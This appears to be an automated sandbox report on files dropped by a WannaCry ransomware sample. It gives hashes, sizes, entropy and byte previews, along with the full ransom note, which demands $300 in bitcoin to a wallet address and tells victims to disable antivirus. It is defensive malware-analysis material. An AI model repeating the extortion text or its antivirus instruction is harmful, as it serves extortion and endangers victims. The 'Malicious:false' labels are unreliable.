                                                                                      Preview:..}B..Xd.......v$.F...qi..W.&..>Q#q.n._{..SX.Yp]..q........;R..}.!....n.2..................d.*...t.\T..x.......&.A....|.IWm......3...G.2.....:.d...(...G.1dr0......H...........k..o....j..e...vRU.....1..:....(.G_c.....P......<.+.oxZ..m.L:..{..D....4..bR.<.U..p.R;.V(Sh>O<.SzZ.e.../0......<.GS...`..l^0[. .7...`M$.?W.Y..".Q...7.7..Z}@..M31Z..`..S%|..._H...m..4r.N_..*.....xr.?z......E.I~.$.R.IV2.5....=5.........i....y.SJ.#.....EJm.$........`.t.#..I.O...\...4.......r...kX...........U0..{..5..@.....1z....nD.Z.D....9-.......,.....W...,t.Ld.K..4..4^b.....J.............ksih..3......x...>.$..............U.F).$c...5.S?.-....D.....d9....V$ma..9.......Io.e.".c...J..7#.e.|Pj.RBf.8k.....7.r(.i..q........V6,.O'.*.k.<*e.../.;Rjzx.\,.......0.....;....#!.l....1.=.-...go.L...h....z..V....*p...Z.B'..m8.......t.^..g.....r(..C7_d@w.G.R..d\5.....2..C2.|......;...a.?..Q-....%.].H.jz..@x=../E..z.q..qymw1. ..p.........S.....W.5.M..}}.!...r.hu.A,l..Hok.^B....6I.'<]..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.843462448252584
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkanHI3boD2OWgjwLGn6wN1GznCgDBFrsN0Axr5JHR5wM/GWtKgx5LWXL+:bk0qbhgxnpN1GWgDBFAN0Axr7HR51OOH
                                                                                      MD5:8AB05982D50256549F8899C8B803A9EA
                                                                                      SHA1:6F4D6A7A976C7EDB85B5D9B6F48F441F42F11856
                                                                                      SHA-256:2A63F9656BF6FCE072354CB9F9EE08F9D44C9FF50A8B0FB9B8DC9D93BAFD412B
                                                                                      SHA-512:07763461F598888ABAD23DA264BBD44BC8F4884942FBB700D20A05879DC8E42BF3D857D23374C1BD5551B8814D32B7C683A9B3146AB0114511E39DD1E7852290
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......8.......:F.T..y....d..^..~.\5^.v.4.....4../.X.C..,L.5..C.i..:h.jl....r. Xa....6y.V.zK..t/.,..:b..z.....QIjv<..l[.... Y.5C.t.z....3....l.?@..N.....@..,4....ev...7 ..L?k..C...0..!.lQ....o.2%.U..q....z.bx........O...pIO...|...f...5.F...I.......................>...kN6..m....~w.93..~...._....G.7.V....}b.=|....R....1F.j*-e...G.cb..;...wK_........%p..y7t]U....!E......!.,{.d?..l.k..4.9..e..W...J..j..?Z.h..\....~H..8...I+....a....NA.1489z.X..N......x?....g..4.:9....'..%....r...2lZ.%..:.q... .2..M.[3..erN.43DJ..Vz....... n...8=H..j/y...~.....LX6.u...PoB.>.A($.....!...|..r..<[..t.+H..,M..}.x[n1.s.qY..[;..L|O.. .r.i...Zh.,..=..........#.x...y.....S..m/.j...M.t.Y..nr.........%..~.%.;Y..[F.P.F..'...);:$..wy ..E....(....'....k......Z..M.8....<..xoA..s...%...c.u....}{xg.J9.`....B..J.9..nP...E....&..#'.w.n?.......|O...7L.O.].H.+...k.+g_. . .....x.m{-q.I.. .f...]..pe.7..A....1.-im...`Y.......Qb....=H+.m.6../..4..h.p...8i..S~...W.iW.`9.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.843462448252584
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkanHI3boD2OWgjwLGn6wN1GznCgDBFrsN0Axr5JHR5wM/GWtKgx5LWXL+:bk0qbhgxnpN1GWgDBFAN0Axr7HR51OOH
                                                                                      MD5:8AB05982D50256549F8899C8B803A9EA
                                                                                      SHA1:6F4D6A7A976C7EDB85B5D9B6F48F441F42F11856
                                                                                      SHA-256:2A63F9656BF6FCE072354CB9F9EE08F9D44C9FF50A8B0FB9B8DC9D93BAFD412B
                                                                                      SHA-512:07763461F598888ABAD23DA264BBD44BC8F4884942FBB700D20A05879DC8E42BF3D857D23374C1BD5551B8814D32B7C683A9B3146AB0114511E39DD1E7852290
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......8.......:F.T..y....d..^..~.\5^.v.4.....4../.X.C..,L.5..C.i..:h.jl....r. Xa....6y.V.zK..t/.,..:b..z.....QIjv<..l[.... Y.5C.t.z....3....l.?@..N.....@..,4....ev...7 ..L?k..C...0..!.lQ....o.2%.U..q....z.bx........O...pIO...|...f...5.F...I.......................>...kN6..m....~w.93..~...._....G.7.V....}b.=|....R....1F.j*-e...G.cb..;...wK_........%p..y7t]U....!E......!.,{.d?..l.k..4.9..e..W...J..j..?Z.h..\....~H..8...I+....a....NA.1489z.X..N......x?....g..4.:9....'..%....r...2lZ.%..:.q... .2..M.[3..erN.43DJ..Vz....... n...8=H..j/y...~.....LX6.u...PoB.>.A($.....!...|..r..<[..t.+H..,M..}.x[n1.s.qY..[;..L|O.. .r.i...Zh.,..=..........#.x...y.....S..m/.j...M.t.Y..nr.........%..~.%.;Y..[F.P.F..'...);:$..wy ..E....(....'....k......Z..M.8....<..xoA..s...%...c.u....}{xg.J9.`....B..J.9..nP...E....&..#'.w.n?.......|O...7L.O.].H.+...k.+g_. . .....x.m{-q.I.. .f...]..pe.7..A....1.-im...`Y.......Qb....=H+.m.6../..4..h.p...8i..S~...W.iW.`9.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.826403123885935
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:vTaV7/fADIhZBQ0NQxWLeVMhbiWsHDlIPdvY7Ut:AxNQ0NQ06QiWswYAt
                                                                                      MD5:76E863F4BB5D6D5BF41C1CB87896979F
                                                                                      SHA1:AD991D31BD43389FD421A6768D56FA7C61C62813
                                                                                      SHA-256:C377151D69C6280446DD40212C0183314521BE754DB7C3A6A5592D7849C3FD21
                                                                                      SHA-512:01C095B37C5660AB6ED4ED0A86C949C97C28CADCE3386BA5DE14522E14EBD799F052B693704C2DA7B0DE98CE81762A248096594E01D61F3F5E11FD4E68B18874
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:#..........r....8...s;l.c>p5].Szmt.J>....05...\...H..a....ED.?R....Y..H.5a.T.&..a...d..<...%......(.y..5.../,/.qp....R...gA....P..@...lv,u....M....Ni......n....d1........n...7/..\f.`.Wq{..4..1S.3X..p.v.^..j......~j....L;].4.oW.....h<...BG.........O.U.r.d!.c.6S..J....[Bx&...g..9`..&...(...%...`ii...UH...M...S.....*../m..t.:3......x..&.......v._Nw...Uy.....,...o....p.t.... .M.....f...?....x....d......RP{)]E~..B...my....n.....c....T..>..>............Q*.2.[.]..z...7.;.......9.._s'.x..uO...9..W.LQ......>~.s...b...n.h)..h..<n+.%b^.7...{..kA.&.:..LeS.'o7U.....S...BC...HI..k6.C."18......w.Z.M._2C7........V"'...`......-.......M.l....6y+.......M...cc...9|.f.|=I...F......V.z..t>F.z+u:.....H.4Lm....*..!...2MHe%..C....?....>....A+Xp..=U.....|S...%.P@>.bK..=H}q...[[R..g.gv*.9{&...`.O.....k.....[..X...TEx.... ..J....J.m........uJE.....d.:.b..WC.....u..;....2..yVZ.K....KC.f....o..v......7"..O..@z.]..;.].uP.$.#_Pr./.....).V..t.>}_..I..f..(.l....@.?.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.829330405944143
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkJRsrr9fPiC9Xn2dbOSX+IAzrPmpPZAgC1UerdEahPHnD:bk6pPikn2RXy/P82geEahPHD
                                                                                      MD5:896FCF6DDE9C4B1999B9D17170FD2038
                                                                                      SHA1:E8DF5E05C57D470690767C096AA31BC8A9A73C2E
                                                                                      SHA-256:1CAFDC01B16F9F13BD9CE314DD9914FA08C47A3DCB10209D830497E6444C5E96
                                                                                      SHA-512:4DE29E13FE3A30A6539520B889F76F5004F743397D115119E4425AACB56326D4F3BB7F5D561DB4329FD2F716161A90FCA17F68E25DA7257B349CE2C973E6C1A9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....PU.S:K....w..P.D..H`..d.B2.2Pi.e..!A/.1......FW^g.UT...o.|....r.h...8....`...?...P.....KRA#XcX....S.eOu.7'Ma.?e.1v....x...Ro.o...n.\Ze,...+lo....`.i.....c.F<D...$.z..HF.........q..hcp..e?PC10.I..Jj=R...f5..o.i....^a.D...~.zJ.dWJ.1..Lw...`.................Q..#..h....G.Ny..y:T..y...[A}}mo.I...#@;M.X.@@..4..-@.......Up_.-m...n..h...6......SZ..4.........F.r)..`..*....o.&<...l..Z.e.l..km-...4...l...3;g^.u...........aI......%c\..!e,..S..1.`.....b....?_...]K5........\.W..hu.{L..mgB.~..[\..#...._......C.:Z!e..sq.2.*..3h|!@......i.W........(..L......@...+.c-+.J.....FLH......*1i*......fa.t..+a....0U.V..m..;.m...R...->..X(..+....;....+5m8...<.....c.pC..Kr.t..y.$p.D...W.I..].r.......K.n.v..a..02j...:......}..c..C.A....wP..XI.I.w..._ogW<l_-..F...g.$:..y..]..q2M.@.)N.=~.....D.e.] ..G.. .9O!.a.`.C.7..-../..N4..B...D..k....Y.t..bHr..%.(.A..&......UF?6O.|...@S}.c....K6.......U.s.L.z.}.....H'....{`......).,>..A...S..ZN.....D..R^*...B..N..n...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.829330405944143
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkJRsrr9fPiC9Xn2dbOSX+IAzrPmpPZAgC1UerdEahPHnD:bk6pPikn2RXy/P82geEahPHD
                                                                                      MD5:896FCF6DDE9C4B1999B9D17170FD2038
                                                                                      SHA1:E8DF5E05C57D470690767C096AA31BC8A9A73C2E
                                                                                      SHA-256:1CAFDC01B16F9F13BD9CE314DD9914FA08C47A3DCB10209D830497E6444C5E96
                                                                                      SHA-512:4DE29E13FE3A30A6539520B889F76F5004F743397D115119E4425AACB56326D4F3BB7F5D561DB4329FD2F716161A90FCA17F68E25DA7257B349CE2C973E6C1A9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....PU.S:K....w..P.D..H`..d.B2.2Pi.e..!A/.1......FW^g.UT...o.|....r.h...8....`...?...P.....KRA#XcX....S.eOu.7'Ma.?e.1v....x...Ro.o...n.\Ze,...+lo....`.i.....c.F<D...$.z..HF.........q..hcp..e?PC10.I..Jj=R...f5..o.i....^a.D...~.zJ.dWJ.1..Lw...`.................Q..#..h....G.Ny..y:T..y...[A}}mo.I...#@;M.X.@@..4..-@.......Up_.-m...n..h...6......SZ..4.........F.r)..`..*....o.&<...l..Z.e.l..km-...4...l...3;g^.u...........aI......%c\..!e,..S..1.`.....b....?_...]K5........\.W..hu.{L..mgB.~..[\..#...._......C.:Z!e..sq.2.*..3h|!@......i.W........(..L......@...+.c-+.J.....FLH......*1i*......fa.t..+a....0U.V..m..;.m...R...->..X(..+....;....+5m8...<.....c.pC..Kr.t..y.$p.D...W.I..].r.......K.n.v..a..02j...:......}..c..C.A....wP..XI.I.w..._ogW<l_-..F...g.$:..y..]..q2M.@.)N.=~.....D.e.] ..G.. .9O!.a.`.C.7..-../..N4..B...D..k....Y.t..bHr..%.(.A..&......UF?6O.|...@S}.c....K6.......U.s.L.z.}.....H'....{`......).,>..A...S..ZN.....D..R^*...B..N..n...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.811502330952758
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:6axw7drHcTmoGZ4LGDPwBqr1xBgxjOEDfrtEPvMfTB4:6pHcTvjNqx3eXRl6
                                                                                      MD5:E751C51989320C5668B1588F775E490A
                                                                                      SHA1:195951F6DCD562DCCEE2D3CDE3334A68A73C05B5
                                                                                      SHA-256:E6E38FAFEABCB94DE10EE154A63C8FAF7927B308F677176FB72B6F9E6E89840F
                                                                                      SHA-512:43FEC04AAFDCCB63AEB4136CE89CEB8B6E49047483EF4189F26C3ADE73BE6296DB186870AE473639D2770ED9D0D5633662665F84563D39A3C67FBACFEBF08DFB
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:b..._(Lm..BX.=.s.0\..$.`k.g.T.?..h.4..A..D .......2j..V .Q..d;.}5.Gp..n~.e.(/..Y..M}.7D+.$....y>.....9.......MGD.Yas....(@... ..j..5a.C.z..".v..0.....Cg..R9.$f.`.XH..=..U.;n..W.p..k.Ua.OLf,i..)...h....#(..g..h..[.=C....b...X..IA.]#g..Oa.8.T.e.Ak....N..U...#..7.'u...g(..].......*.2.....j_(&+z....?.*...Y...7.K..p..e./.........zE.i.tN.=mE~.X...........*Q..*..s.7{D.".a.......gi...F-.Km........%....."...cn.8.L..Y~.:..;..a...w.&R.....=c..k|:@.g....2.f.s...).x4...cw8.R6.....^&?J.)CW.._.&;.... ......E.D.PR.f....F......8'.4d.j...w..d....?1K.Sd|.(n......Q.^a..6*.@......."~$...M.|.>.x.. .p..'.;.....;x...8..q..]...m.".Nr........U\..lz...(UA..f.....B..u'0 .}.&a.~...g{..*X<.;.\9....T...N..'........<Wv..j.F...<'v3....H...!.U.".`.8..........fv......-..6.@.p..s.,c.sO%Vw..t=.en..PN..i.....{.B..<..uN...i.#P..s...^U{l"..#f6...6..7.....7[.sr...c..^...k....n........p...<..BBd.~..@QN].a.gb...4.FD.X..!..L.f.\0 ...2..`.\T.......)...{."q....*..8 ..ki
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.836985645888485
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkzNpW7tCt4NqvBrmsJY/c7gEXJAOVmv/Vm1ZHCrv4hKYxJ6rCIsOxt2FAmll+EY:bkzNqCtv/XJA7CaGKm7IJOy
                                                                                      MD5:9453D52C729DA49D1D0543BF6B6A6471
                                                                                      SHA1:CF8DDAA9523756FFDFDBF548EE2F38E61650CFDB
                                                                                      SHA-256:A3C6C00370DB629924834976F82F9AC23CCC2D728F49E13D9631258318DC2A9B
                                                                                      SHA-512:49A2A626C9EB3414B08AECE56C0519DB9D07202BA30B25B7471B5C64B9793D08AC6B3D5C60E4A38956E8B0E08ACE6DB241CFF602B2AE76B4E1CF64622D8F842E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......}....I.......+..X......'..^...K..6!...1....[."....]b.l.7.t4.Z..X.@*..z2...U.f.j.'..(..".Kl@.p............t..B?..... .5\.t.Z..v....~....H.%9`i3.....m]I....8T]o.d5...6..,.d;..W..8..j..y..G...Ql..M.$..z...KN-..IT`?..&...-...}.i...G...{a....d................t...ks..|l......v.].p.{.~..k.R#..c.....Yz.....az.......Z..PbpM.9..r....v....{.M..u.r(..4....u...a..9E_{..hq../sV......{..Nu....{..k..?..'.t...n...W.m*...............x%.........DMM..|.K..P..X...:....x8..3H!..]...*.:...P..4!L..iBH../Al.....T..J,..n.s.Fr.Y).t9K..8..%a w.}.`..dLt.J(..2.|.%...z.;O.8..H....J-.u.L......I..Y...H.lZ..C....y...........t.*.O.;-..O!..Y^.]P...U.....oZ=.9...A.`.......".[.in.[*..B$]..\.q.A.f.U..V..o..4.....".mR-.#...2....f7.N..57`.........E....l...?..s;.e....q..s.I..5.i4...fh.......%.A...p..0.C..E.H...r.9.3.>..`..=.e4b$.za.!`..~..i..~.....P....x.3W..eR....b..{.......0"...n.9.o=N./.$.3...2.....#.F..,G..ab..3.CM.....F./...n..I.!.s5\.O..g....4..qhk.......B..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.836985645888485
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkzNpW7tCt4NqvBrmsJY/c7gEXJAOVmv/Vm1ZHCrv4hKYxJ6rCIsOxt2FAmll+EY:bkzNqCtv/XJA7CaGKm7IJOy
                                                                                      MD5:9453D52C729DA49D1D0543BF6B6A6471
                                                                                      SHA1:CF8DDAA9523756FFDFDBF548EE2F38E61650CFDB
                                                                                      SHA-256:A3C6C00370DB629924834976F82F9AC23CCC2D728F49E13D9631258318DC2A9B
                                                                                      SHA-512:49A2A626C9EB3414B08AECE56C0519DB9D07202BA30B25B7471B5C64B9793D08AC6B3D5C60E4A38956E8B0E08ACE6DB241CFF602B2AE76B4E1CF64622D8F842E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......}....I.......+..X......'..^...K..6!...1....[."....]b.l.7.t4.Z..X.@*..z2...U.f.j.'..(..".Kl@.p............t..B?..... .5\.t.Z..v....~....H.%9`i3.....m]I....8T]o.d5...6..,.d;..W..8..j..y..G...Ql..M.$..z...KN-..IT`?..&...-...}.i...G...{a....d................t...ks..|l......v.].p.{.~..k.R#..c.....Yz.....az.......Z..PbpM.9..r....v....{.M..u.r(..4....u...a..9E_{..hq../sV......{..Nu....{..k..?..'.t...n...W.m*...............x%.........DMM..|.K..P..X...:....x8..3H!..]...*.:...P..4!L..iBH../Al.....T..J,..n.s.Fr.Y).t9K..8..%a w.}.`..dLt.J(..2.|.%...z.;O.8..H....J-.u.L......I..Y...H.lZ..C....y...........t.*.O.;-..O!..Y^.]P...U.....oZ=.9...A.`.......".[.in.[*..B$]..\.q.A.f.U..V..o..4.....".mR-.#...2....f7.N..57`.........E....l...?..s;.e....q..s.I..5.i4...fh.......%.A...p..0.C..E.H...r.9.3.>..`..=.e4b$.za.!`..~..i..~.....P....x.3W..eR....b..{.......0"...n.9.o=N./.$.3...2.....#.F..,G..ab..3.CM.....F./...n..I.!.s5\.O..g....4..qhk.......B..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):933
                                                                                      Entropy (8bit):4.711824502619554
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                                                      MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                                                      SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                                                      SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                                                      SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Mar 23 13:47:49 2024, mtime=Sat Mar 23 13:47:49 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):1189
                                                                                      Entropy (8bit):5.040493253287504
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:88qLHOLm86eCRBlgK21Z5bpEO9l7vQAPic3qygm:882HOLm8iRyv17vPQyg
                                                                                      MD5:702D04031DD9BF002906D9511CD8FA24
                                                                                      SHA1:332DBCC83F66AEE905A99AE92416F189CFCF545F
                                                                                      SHA-256:704A9F74AA11DF406AF01B1B417E5BEC073220739AA562F76DC18804C04F7BD4
                                                                                      SHA-512:6D246DCDDF79E7EC911A80C6F8DA38B292A79946B01C1E4BCED43347649018A7BCFD29812D8DC6DE61672F013246F571C1F7C07C7309E20DD3A13154788FEB8A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:L..................F.... ....{Q.1}...'g.1}...X.H............................X.:..DG..Yr?.D..U..k0.&...&.........{4.....S.0}....q.1}......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.HwX.u..............................A.p.p.D.a.t.a...B.P.1.....wX.u..Local.<......FW.HwX.u...........................M..L.o.c.a.l.....N.1.....wX.u..Temp..:......FW.HwX.u..........................O...T.e.m.p.......1.....wX.u..TEMP1_~1.ZIP..l......wX.uwX.u....c.....................?.o.T.e.m.p.1._.R.a.n.s.o.m.w.a.r.e...W.a.n.n.a.C.r.y...z.i.p.....t.2......J.. .@WANAD~1.EXE..X......wX.uwX.u.....Y........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......................-...........................C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.........|....I.J.H..K..:...`.......X.......134349...........hT..CrF.f4... .P.............%..hT..CrF.f4... .P.............%.............1SPS.XF.L8C.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.849204193187309
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:tKOiprxcTbn2lnAFvG4NCRE4m/+VJxrbxlQuWkx:Ni7cTL2nAFu4NCS/+x/xf9
                                                                                      MD5:0ED515A9EEC38FB9AEEEBBC0B7EF4972
                                                                                      SHA1:9D07AB1A743F81E640585F284C35E6E69A74F26E
                                                                                      SHA-256:F21649B6B506C47C3ED589CE7FDC0E66CE52C2B72C6567D5CBF6ECF36FCC37D8
                                                                                      SHA-512:9FFB8426A100D23D35352C01EF135CA83BFC7807D3D6AC9A75FDD080341937A9DC8E78C258073DB1BEE9926F8E534540B3B6215537734C17AD22661FD824100E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...#....}..m..+&SF-c..3T.kOpdR.w..%..:.t"{..}...y`.Y_k0Pf...Cu....l:.CT......*..)wT....s..Q.c.g.s.f.t......6M...*]}d3).9.`.Jpz..W..G.........v....A..l.I}.Rd......!16....j.*e..k*n.....0a.W..;.S..~?U.A9:.[..c[....ai...$@d.u~.6.D.P....._....G....?..+.o.....6..L6...y.v..!....`4..K...+.*..3.....=u..y9 ..IYTs..|..z.F......o...D....}........z.P....}dx..h_[2| .@_..(..>e.=....R.\...OP.x..\T...E..O/.^.i..+.bB8hs1...?.U..v..I>C...^D..Xt.....*P..U..7.7.z..e.]._A/1.f1..n.)..pk-.t..TA..b..T..\-....`..@......E.6..'r..........e.K...z.Yz.5.H.0..D..oN..vNq9.`..]r..Oha....Z.n.IG....2N....Q..tX..........l}.......p...5...4...*$J.zQ...`g.tJ.\..?.<?.K.f.....u...#Ek..U(h2xB.......F.......).Cp.u.#X .A.\rh....&....R.Hf..A~..B13.~0...oo......r...X...t,...o.._'.a.eF.h.$f.E..i....Y.......{y.cGrY.E..../..>.].w.WGk.EZ.vb.1ic.@...Ii5.x...............zA`H..m..CUWl..g.u.....Y7^.o../....I.....h.....X?....7.{g1.X+...Pt.>...{.=`P.Z...79".w..Kn..N.lJj..E3.8.nq..\...IE.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.83395485373649
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk3MCwcil9Iu1O55AgdoEUiZ20yGfGvSVijbuji/A2ID1q0nUBu4RdyoID9Ui0WZ:bk3UyPRdo5iryGfGvbCjZUQDD2Pc
                                                                                      MD5:82B48439A6F82833B3138EC4D177E68A
                                                                                      SHA1:4104032619D00D2E82CCE349AE63C976512BCA78
                                                                                      SHA-256:AE8EF55445E4EA2864CD49435252490F6EB55178DE96DE347CADC3B2ECC5233E
                                                                                      SHA-512:4B52B96A4AC390902F5A87015941706C3267F139B397289AE5A33BA67D38B1B59398C140EE924AD88C761379F066E4B27E7E2C6AD69B14E32F4A2BCEC5DC9FF5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....^.0v(.&...." ..C&.mE.i'..`.o....H.u.![_....yE4.if......l..=d..M.%.2[...w;...T'2|..?N.&$.xBQ.r.+`...h..m...{%..f..T....;.....8....?w]o..........7..+..gMy..b{.r)*.&I....rPi..7rf..5.?....Yo.K.K...w;. J..@..mY..k.C<..$mF.......B...8...0....Gm:.............1=.Q%....{/.@...>9..x+..u...s.Y.:....K.V.n..L...=m......f....;[...|.;....a.8>...=T....3M..e;...:..I....I..0A.L..d...._.]C73}/.n.O..R3.".K....V1.........a.......g.^V....Xt<T.v....e}qS..5...A....t..z!s..1....0~.....t.uR..m.A........qF....i.<.S*....K.%.*.h......t5:......:.f....[f.dg7...J..*.e...K.d.._..Qn.._q.{.6M.H...6.."lm.)....&fb...jb..\."'%.n.n.r.5oE.L...m.i.4.-.cNz.n.\i.s..... M_.qm.(".&k.W.1Du7^....'!........3l[:...!z..b...(..t!.~j..5..O>.R...*..|..Q.Z;.&#....Q...Qm...~2v.>....(...4.)i3.....B#3.%...8z)Jw..G.}BzE...o[.."7v....(.(k......X.S..?..A.@F.a..@.im..X..Y....O..r......B...^....95..3S.T.%.6......h.....Vm...v0...\........=&S..A.L.m..E.........(.m........=E.k..O..l..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.83395485373649
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk3MCwcil9Iu1O55AgdoEUiZ20yGfGvSVijbuji/A2ID1q0nUBu4RdyoID9Ui0WZ:bk3UyPRdo5iryGfGvbCjZUQDD2Pc
                                                                                      MD5:82B48439A6F82833B3138EC4D177E68A
                                                                                      SHA1:4104032619D00D2E82CCE349AE63C976512BCA78
                                                                                      SHA-256:AE8EF55445E4EA2864CD49435252490F6EB55178DE96DE347CADC3B2ECC5233E
                                                                                      SHA-512:4B52B96A4AC390902F5A87015941706C3267F139B397289AE5A33BA67D38B1B59398C140EE924AD88C761379F066E4B27E7E2C6AD69B14E32F4A2BCEC5DC9FF5
                                                                                      Malicious:false
                                                                                      Reputation:low
